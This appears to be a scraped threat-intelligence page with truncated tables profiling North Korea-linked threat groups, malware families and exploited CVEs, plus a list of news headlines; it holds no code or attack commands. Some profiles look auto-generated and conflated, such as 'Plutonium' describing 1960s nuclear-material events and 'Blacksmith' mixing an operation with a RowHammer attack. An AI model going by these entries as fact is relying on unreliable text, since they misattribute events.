| ID | Votes | Profile Description |
|---|---|---|
| Lazarus Group | 5 | The Lazarus Group, a notorious threat actor believed to be linked to North Korea, has been attributed with a series of significant cyber-attacks over the past few years. The group's malicious activities include the exploitation of digital infrastructure, stealing cryptocurrency, and executing large- |
| Onyx Sleet | 4 | Onyx Sleet, a North Korean nation-state threat actor, has been identified as a significant cybersecurity risk by Microsoft. Operating under the Lazarus Group umbrella, Onyx Sleet primarily targets defense and IT services organizations in South Korea, the United States, and India. In October 2023, Mi |
| Stonefly | 3 | Stonefly, also known as Andariel or Silent Chollima, is a threat actor group believed to be linked with the North Korean government. Active since at least 2015, Stonefly has been involved in numerous attacks, including several attributed to the North Korean state-sponsored operation Lazarus. The gro |
| Silent Chollima | 3 | Silent Chollima, a North Korea-nexus threat actor, is known for its malicious cyber activities. The group, which is part of the 3rd Bureau of the Foreign Intelligence and Reconnaissance General Bureau, North Korea's foreign intelligence agency, has been associated with other groups such as Lazarus, |
| Rgb | 3 | RGB, a threat actor with ties to North Korea, has been involved in a range of malicious cyber activities. The group was designated by the Office of Foreign Assets Control (OFAC) on January 2, 2015, under Executive Order 13687 for being a controlled entity of the North Korean government. In addition |
| Reconnaissance General Bureau | 3 | The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency responsible for clandestine operations abroad, including cyber activities. The RGB has been associated with several threat actors, including the BeagleBoyz, who have likely been active since at least 2014. Other groups lin |
| APT38 | 2 | APT38, also known as TA444, BlueNoroff, BlackAlicanto, Coperenicum, Sapphire Sleet, Stardust Chollima, and TraderTraitor, is a threat actor group suspected to be backed by the North Korean regime. The group has been active in operations across over 16 organizations in at least 11 countries, primaril |
| Bluenoroff | 2 | BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software, |
| ZINC | 2 | Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been actively involved in cyberattacks on global media, defense, and IT industries. Microsoft's Threat Intelligence Center has been tracking the group's activities, which have included weaponizing open-source softw |
| Reconnaissance General Bureau Rgb | 2 | The Reconnaissance General Bureau (RGB) is a North Korean military intelligence agency identified as a threat actor responsible for various cyberattacks. RGB is associated with hacking groups known as the "Lazarus Group," "Bluenoroff," and "Andariel," which are recognized as agencies or controlled e |
| Plutonium | 2 | Plutonium, a threat actor with potentially global implications, has been involved in several critical incidents. The group's activities have been traced back to the 1960s when alleged Israeli scientists visited NUMEC, claiming to obtain plutonium-238 for non-nuclear projects. The lack of stringent r |
| Apt43 | 1 | APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity |
| Labyrinth Chollima | 1 | Labyrinth Chollima, a threat actor linked to North Korea, has been involved in numerous malicious activities since 2009. Tracked by CrowdStrike and other cybersecurity organizations, Labyrinth Chollima is part of the Lazarus Group, known for stealthy attacks targeting various industries such as acad |
| Blacksmith | 1 | Operation Blacksmith is a campaign that was first unveiled in 2021 by researchers who demonstrated a BlackSmith attack. This attack showed that it's possible to cause failures even with RowHammer protections in place, thereby bypassing these security measures. The campaign employed at least three ne |
| Lilacsquid | 1 | LilacSquid is a threat actor that has been actively targeting organizations in the U.S., Europe, and Asia since at least 2021. This group utilizes various tactics, techniques, and procedures (TTPs) to execute their malicious activities, including the use of Secure Socket Funneling (SSF) to establish |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| Earlyrat | Unspecified | 2 | EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases, |
| Ninerat | Unspecified | 2 | NineRAT is a malware strain developed by the Lazarus group, and it was first used in Operation Blacksmith in March 2022 against a South American agricultural organization. The malware was initially built around May 2022 and was later observed being utilized in September against a European manufactur |
| Collectionrat | Unspecified | 2 | CollectionRAT is a newly identified malware, discovered by cybersecurity researchers who traced its origins through reused infrastructure components. This malicious software, short for Malware, is designed to exploit and damage computers or devices, often infiltrating systems via suspicious download |
| Lockbit | Unspecified | 1 | LockBit is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. It can enter your system through various channels such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt |
| Dtrack | Unspecified | 1 | DTrack is a type of malware, or malicious software, known for its destructive capabilities. It can infiltrate systems through dubious downloads, emails, or websites and wreak havoc by stealing personal information, disrupting operations, or holding data hostage for ransom. Notably, DTrack was utiliz |
| WannaCry | Unspecified | 1 | WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t |
| Dtrack Backdoor | Unspecified | 1 | The DTrack backdoor is a malicious software (malware) primarily used by the Andariel group, a cybercriminal entity known for its sophisticated cyberattacks. The malware infects Windows machines by executing a Log4j exploit, which downloads additional harmful software from a command-and-control (C2) |
| Magicrat | Unspecified | 1 | MagicRAT is a type of malware, first observed by Cisco Talos in 2022, that was used by the Lazarus Group to exploit vulnerabilities in publicly exposed VMWare Horizon platforms, primarily targeting energy companies worldwide. This malicious software, which can infiltrate systems through suspicious d |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| Kimsuky | Unspecified | 5 | Kimsuky is a North Korea-linked advanced persistent threat (APT) group that conducts global cyber-attacks to gather intelligence for the North Korean government. The group has been identified as a significant threat actor, executing actions with malicious intent, and has recently targeted victims vi |
| temp.hermit | Unspecified | 2 | Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni |
| Lazarus Team | Unspecified | 1 | None |
| Diamond Sleet | Unspecified | 1 | Diamond Sleet, a North Korea-linked Advanced Persistent Threat (APT), has been identified as a significant threat actor in the cybersecurity landscape. This group is known for its sophisticated supply chain attacks, specifically leveraging CyberLink software to execute their malicious activities. Th |
| APT37 | Unspecified | 1 | APT37, also known as ScarCruft, Reaper, or Group123, is a threat actor suspected to be linked to North Korea. It primarily targets South Korea but has also extended its activities to Japan, Vietnam, and the Middle East, focusing on various industry verticals such as chemicals, electronics, manufactu |
| ScarCruft | Unspecified | 1 | ScarCruft, also known as APT37, Inky Squid, RedEyes, Reaper, or Group123, is a North Korean threat actor group associated with malicious cyber activities. Their actions have been linked to the execution of targeted attacks against individual Android devices, as outlined in a VB2023 paper titled "Int |
| APT29 | Unspecified | 1 | APT29, also known as Cozy Bear, SVR group, BlueBravo, Nobelium, Midnight Blizzard, and The Dukes, is a threat actor linked to Russia. This group is notorious for its malicious activities in the cybersecurity realm, executing actions with harmful intent. It has been associated with several high-profi |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| CVE-2023-42793 | Unspecified | 4 | CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre |
| Log4Shell | Unspecified | 3 | Log4Shell is a software vulnerability, specifically a flaw in the design or implementation of the popular Java logging library, Log4j. Identified as CVE-2021-44228, this vulnerability allows an attacker to remotely execute arbitrary code, often leading to full system compromise. Advanced Persistent |
| CVE-2023-46604 | Unspecified | 1 | CVE-2023-46604 is a critical vulnerability identified in Apache ActiveMQ, specifically affecting versions prior to 5.15.16, 5.16.7, 5.17.6, and 5.18.3. This flaw, which lies within the Java OpenWire protocol marshaller, allows for Remote Code Execution (RCE) and has been assigned a maximum severity |
| Hazyload | Unspecified | 1 | HazyLoad is a software vulnerability exploited by the threat actor Andariel to establish a direct connection with infected systems, bypassing the need for continued exploitation of the Log4j flaw. This custom-made implant acts as a proxy tool, allowing attackers to maintain persistence in the system |
| Source | CreatedAt | Title |
|---|---|---|
| DARKReading | 2 months ago | LilacSquid APT Employs Open Source Tools, QuasarRAT |
| Securityaffairs | 2 months ago | LilacSquid APT targeted orgs in the U.S., Europe, and Asia |
| Securelist | 3 months ago | APT trends report Q1 2024 – Securelist |
| Checkpoint | 3 months ago | 29th April – Threat Intelligence Report - Check Point Research |
| DARKReading | 3 months ago | 3 DPRK APTs Spied on South Korea Defense Industry |
| InfoSecurity-magazine | 3 months ago | North Korean Hackers Target Dozens of Defense Companies |
| Securityaffairs | 3 months ago | North Korea-linked APT groups target South Korean defense contractors |
| CERT-EU | 5 months ago | Critical JetBrains TeamCity flaws come under active attacks |
| CERT-EU | 5 months ago | JetBrain urges to fix critical TeamCity On-Premises vulnerabilities |
| CERT-EU | 7 months ago | Cyber Security Week In Review: December 29, 2023 |
| CERT-EU | 7 months ago | Apache ActiveMQ Vulnerability: The Threat That Cannot Be Ignored |
| DARKReading | 7 months ago | Global TeamCity Exploitation Opens Door to SolarWinds-Style Nightmare |
| BankInfoSecurity | 7 months ago | Lazarus Exploits Log4Shell to Deploy Telegram-Based Malware |
| CERT-EU | 7 months ago | Lazarus Group continues to exploit Log4j flaw in latest campaign |
| CERT-EU | 7 months ago | Lazarus Group Exploits Log4j Flaw in New Malware Campaign |
| CERT-EU | 7 months ago | Lazarus Cyber Group Deploys DLang Malware Strains - Slashdot |
| Securityaffairs | 7 months ago | Operation Blacksmith: Lazarus exploits Log4j flaws to deploy DLang malware |
| CERT-EU | 7 months ago | Stronger action against North Korean cyber threats pushed by US, South Korea, Japan |
| CERT-EU | 8 months ago | Lazarus Group bang on trend with memory-safe Dlang malware |
| DARKReading | 8 months ago | Lazarus Group Is Still Juicing Log4Shell, Using RATs Written in 'D' |